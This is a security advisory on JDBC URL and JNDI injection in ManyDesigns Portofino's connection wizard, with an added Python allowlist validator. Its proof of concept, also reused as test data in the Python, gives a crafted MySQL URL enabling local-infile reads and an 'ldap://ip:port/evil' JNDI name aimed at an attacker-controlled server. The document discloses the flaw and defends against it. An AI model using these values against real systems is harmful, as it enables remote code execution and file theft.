BUG_Author: R1ckyZ
Affected Version: Portofino ≤ 5.3.4
Vendor: ManyDesigns
Software: Portofino
Vulnerability Files:
- upstairs/src/main/java/com/manydesigns/portofino/upstairs/actions/database/connections/ConnectionsAction.java
- portofino-model/src/main/java/com/manydesigns/portofino/model/database/JdbcConnectionProvider.java
- portofino-model/src/main/java/com/manydesigns/portofino/model/database/JndiConnectionProvider.java
Description:
The API /api/portofino-upstairs/database/connections lets an administrator register custom JDBC and JNDI connections. The connection URL and the JNDI resource name supplied by the user are handed unfiltered to the JDBC driver and to the JNDI lookup, so features of the bundled dependencies that were never meant to be reachable from a web form become attacker-controlled. With a MySQL-compatible JDBC driver, URL properties such as autoDeserialize (BLOB values are deserialised as Java objects), allowLoadLocalInfile and allowUrlInLocalInfile (a malicious server can request the contents of local files or URLs through LOAD DATA LOCAL INFILE) can lead to Remote Code Execution (RCE) or arbitrary file reads on the Portofino host. A JNDI connection can be pointed at an attacker-controlled LDAP or RMI endpoint (JNDI injection), with the same outcome.
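As an added example that is not part of this advisory and not Portofino's own code, the following Python models the check the createConnection path is missing: an allowlist on JDBC connection properties (so autoDeserialize, allowLoadLocalInfile, allowUrlInLocalInfile and any other unknown driver option are refused) and a container-local-only rule for JNDI names, run against the values from this report's PoC. The subprotocol and property allowlists, the java:comp/env/ prefix rule and all function names are this example's own assumptions.

```python
"""Added example (not Portofino code): validate administrator-supplied JDBC
URLs and JNDI names before they reach DriverManager / InitialContext.
All allowlists below are this example's own choices."""
from urllib.parse import urlsplit, parse_qsl

# Per-subprotocol allowlist of connection properties an administrator may set.
# Anything not listed is rejected, which covers autoDeserialize,
# allowLoadLocalInfile, allowUrlInLocalInfile and every other driver option
# that reaches the file system or the deserialiser. Keys are lower-cased so
# that case variations of a property name cannot slip past the check.
ALLOWED_JDBC_PROPERTIES = {
    "mysql": {"user", "password", "usessl", "requiressl", "servertimezone",
              "characterencoding", "connecttimeout", "sockettimeout"},
    "mariadb": {"user", "password", "usessl", "servertimezone",
                "characterencoding", "connecttimeout", "sockettimeout"},
    "postgresql": {"user", "password", "ssl", "sslmode", "connecttimeout"},
}

# Only container-local JNDI names are accepted. A URL-style name
# (ldap://, rmi://, iiop://, dns://, ...) would make InitialContext contact a
# naming service chosen by the administrator, i.e. JNDI injection.
JNDI_LOCAL_PREFIX = "java:comp/env/"

# The JDBC URL from the PoC, with its ip:port placeholder left as written.
POC_JDBC_URL = ("jdbc:mysql://ip:port/test?disableMariaDbDriver=true"
                "&allowLoadLocalInfile=true&allowUrlInLocalInfile=true")
# Constructed benign URL for comparison.
SAFE_JDBC_URL = "jdbc:mysql://db.internal:3306/app?user=app&useSSL=true"


class RejectedConnection(ValueError):
    """Raised when an administrator-supplied connection value is refused."""


def parse_jdbc_url(url):
    """Split 'jdbc:<subprotocol>://host[:port]/db?k=v&...' into its parts.

    Returns (subprotocol, netloc, path, [(key, value), ...]). Keys are
    lower-cased and percent-decoded; blank values are kept so that a bare
    '?autoDeserialize' is still seen. Forms without a '//host' part
    (e.g. jdbc:mysql:loadbalance://...) are refused outright.
    """
    if not url.lower().startswith("jdbc:"):
        raise RejectedConnection("not a JDBC URL")
    parts = urlsplit(url[len("jdbc:"):])
    if not parts.scheme or not parts.netloc:
        raise RejectedConnection("JDBC URL must be jdbc:<subprotocol>://host/db")
    props = [(k.lower(), v)
             for k, v in parse_qsl(parts.query, keep_blank_values=True)]
    return parts.scheme.lower(), parts.netloc, parts.path, props


def rejected_jdbc_properties(url):
    """Sorted names of properties in url that are not on the allowlist."""
    subprotocol, _netloc, _path, props = parse_jdbc_url(url)
    allowed = ALLOWED_JDBC_PROPERTIES.get(subprotocol)
    if allowed is None:
        raise RejectedConnection(f"unsupported JDBC subprotocol: {subprotocol}")
    return sorted({k for k, _ in props if k not in allowed})


def check_jdbc_url(url):
    """Return url unchanged if acceptable, else raise RejectedConnection."""
    bad = rejected_jdbc_properties(url)
    if bad:
        raise RejectedConnection(f"disallowed connection properties: {bad}")
    return url


def check_jndi_name(name):
    """Accept only container-local names such as java:comp/env/jdbc/app."""
    rest = name[len(JNDI_LOCAL_PREFIX):]
    if not name.startswith(JNDI_LOCAL_PREFIX) or "//" in rest or ":" in rest:
        raise RejectedConnection(f"JNDI resource must be below {JNDI_LOCAL_PREFIX}")
    return name


if __name__ == "__main__":
    for url in (SAFE_JDBC_URL, POC_JDBC_URL):
        print(url, "->", rejected_jdbc_properties(url) or "accepted")
    for jndi in ("java:comp/env/jdbc/app", "ldap://ip:port/evil"):
        try:
            print(jndi, "->", check_jndi_name(jndi))
        except RejectedConnection as e:
            print(jndi, "->", e)
```

In Portofino the equivalent check belongs in ConnectionsAction before a JdbcConnectionProvider or JndiConnectionProvider is created from the request. Note that property allowlists are driver-specific; the lists above only cover the MySQL-family URL shown in the PoC, and a deployment that bundles other drivers needs its own entries for each of them.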
Proof of Concept:
- Log in as an administrator and open /portofino-upstairs/wizard to create a JDBC or JNDI connection.
- Enter the crafted value into the Connection URL or JNDI resource field, then click Next to trigger the createConnection action. In both values, ip:port is a server under the attacker's control (a rogue MySQL server, or an LDAP server for the JNDI case); disableMariaDbDriver=true makes the MariaDB driver decline the jdbc:mysql: URL so that it is handled by MySQL Connector/J, where the remaining properties take effect.
  Connection URL: jdbc:mysql://ip:port/test?disableMariaDbDriver=true&allowLoadLocalInfile=true&allowUrlInLocalInfile=true
  JNDI resource: ldap://ip:port/evil